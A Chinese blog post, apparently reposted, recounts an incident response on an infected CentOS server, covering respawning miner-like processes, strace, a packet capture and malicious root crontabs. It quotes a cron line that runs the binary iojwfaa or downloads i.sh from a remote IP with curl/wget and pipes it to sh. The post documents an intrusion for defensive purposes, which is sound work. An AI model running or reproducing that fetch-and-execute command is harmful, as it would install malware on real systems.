肉鸡体验卡

Posted qqzj

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了肉鸡体验卡相关的知识,希望对你有一定的参考价值。

发现服务器CPU异常

技术图片

PPID为1   kill -9 该进程后又重新恢复了   可能起了定时任务

strace分析异常,一直在获取时间

技术图片

 

抓包发现可疑IP 可能与邮件相关

技术图片

 

 

 技术图片

 

 

 

发现异常进程名,罪魁祸首

技术图片

 

 

 

杀死这两个进程后一段时间收到邮件

 

技术图片

部分内容如下:

From root@centos.localdomain  Thu Jan 16 01:45:01 2020

Return-Path: <root@centos.localdomain>

X-Original-To: root

Delivered-To: root@centos.localdomain

Received: by centos.localdomain (Postfix, from userid 0)

 id A729AC0BD1; Thu, 16 Jan 2020 01:45:01 +0800 (CST)

From: "(Cron Daemon)" <root@centos.localdomain>

To: root@centos.localdomain

Subject: Cron <root@centos> (/usr/bin/iojwfaa||/usr/libexec/iojwfaa||/usr/local/bin/iojwfaa||/tmp/iojwfaa||curl -fsSL -m180 http://157.245.59.230:8000/i.sh||wget -q -T180 -O- http://157.245.59.230:8000/i.sh) | sh

Content-Type: text/plain; charset=UTF-8 

 

然后两个病毒进程恢复

发现/var/spool/cron/crontabs  /var/spool/cron下均有root脚本,彻底排查删除所有相关的目录下的病毒脚本,杀死进程后终于恢复正常

 

执行文件iojwfaa

技术图片

技术图片

暂时无法反编译获取相关内容

 

以上是关于肉鸡体验卡的主要内容,如果未能解决你的问题,请参考以下文章

团队合作初体验

荔枝派nano初体验-windows写入镜像到TF卡启动

注意!物联卡也能搭建“流量池”,根据开通步骤快来体验一下吧

比树莓派配置好接地气的香蕉派上手初体验

说一说黑苹果的体验

“朝中有人好办事”滴滴师兄内推轻松拿下offer,万万没想到竟是3天体验卡!